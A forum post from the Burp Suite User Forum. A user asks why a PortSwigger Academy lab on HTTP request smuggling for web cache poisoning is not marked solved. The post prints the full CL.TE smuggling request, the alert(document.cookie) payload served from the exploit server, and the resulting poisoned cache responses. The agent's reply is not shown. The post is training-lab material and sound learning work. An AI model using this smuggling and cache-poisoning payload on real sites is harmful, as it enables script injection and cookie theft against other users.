Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Unable to solve: Lab: Exploiting HTTP request smuggling to perform web cache poisoning

2lfa | Last updated: Jul 30, 2024 01:37PM UTC

As the title stated, I am unable to solve this lab. I follow the exploit steps, and it works, I manage to poison the cache and get a redirection to my exploit server, so that the alert get executed (even though it's empty). But the lab doesn't get solved!! On exploit server my crafted response looks like this: ------------------------------------------------- HTTP/2 200 OK Content-Type: text/javascript; charset=utf-8 Server: Academy Exploit Server Content-Length: 22 alert(document.cookie) ------------------------------------------------- My exploit looks like the following: ------------------------------------------------- POST / HTTP/1.1 Host: abcdabcdabcdabcdabcdabcdabcdabcde.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 180 Transfer-Encoding: chunked 0 GET /post/next?postId=3 HTTP/1.1 Host: exploit-exploitexploitexploitexploitexpl.exploit-server.net Content-Type: application/x-www-form-urlencoded Content-Length: 10 x=1 ------------------------------------------------- After I manage to poison the cache I obtain: ------------------------------------------------- REQUEST ------------------------------------------------- GET /resources/js/tracking.js HTTP/2 Host: abcdabcdabcdabcdabcdabcdabcdabc.web-security-academy.net Cookie: session=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa User-Agent: Mozilla/5.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: https://abcdabcdabcdabcdabcdabcdabcdabc.web-security-academy.net/ Sec-Fetch-Dest: script Sec-Fetch-Mode: no-cors Sec-Fetch-Site: same-origin Te: trailers ------------------------------------------------- ------------------------------------------------- RESPONSE ------------------------------------------------- HTTP/2 302 Found Location: https://exploit-exploitexploitexploitexploitexpl.exploit-server.net/post?postId=4 X-Frame-Options: SAMEORIGIN Cache-Control: max-age=30 Age: 8 X-Cache: hit Content-Length: 0 ------------------------------------------------- ------------------------------------------------- REQUEST ------------------------------------------------- GET /post?postId=4 HTTP/2 Host: exploit-exploitexploitexploitexploitexpl.exploit-server.net User-Agent: Mozilla/5.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: https://abcdabcdabcdabcdabcdabcdabcdabc.web-security-academy.net/ Sec-Fetch-Dest: script Sec-Fetch-Mode: no-cors Sec-Fetch-Site: cross-site Te: trailers ------------------------------------------------- ------------------------------------------------- RESPONSE ------------------------------------------------- HTTP/2 200 OK Content-Type: text/javascript; charset=utf-8 Server: Academy Exploit Server Content-Length: 22 alert(document.cookie) ------------------------------------------------- Why the lab doesn't get solved even thought I get a redirection to my exploit server and the alert script is executed?!

Michelle, PortSwigger Agent | Last updated: Jul 31, 2024 12:15PM UTC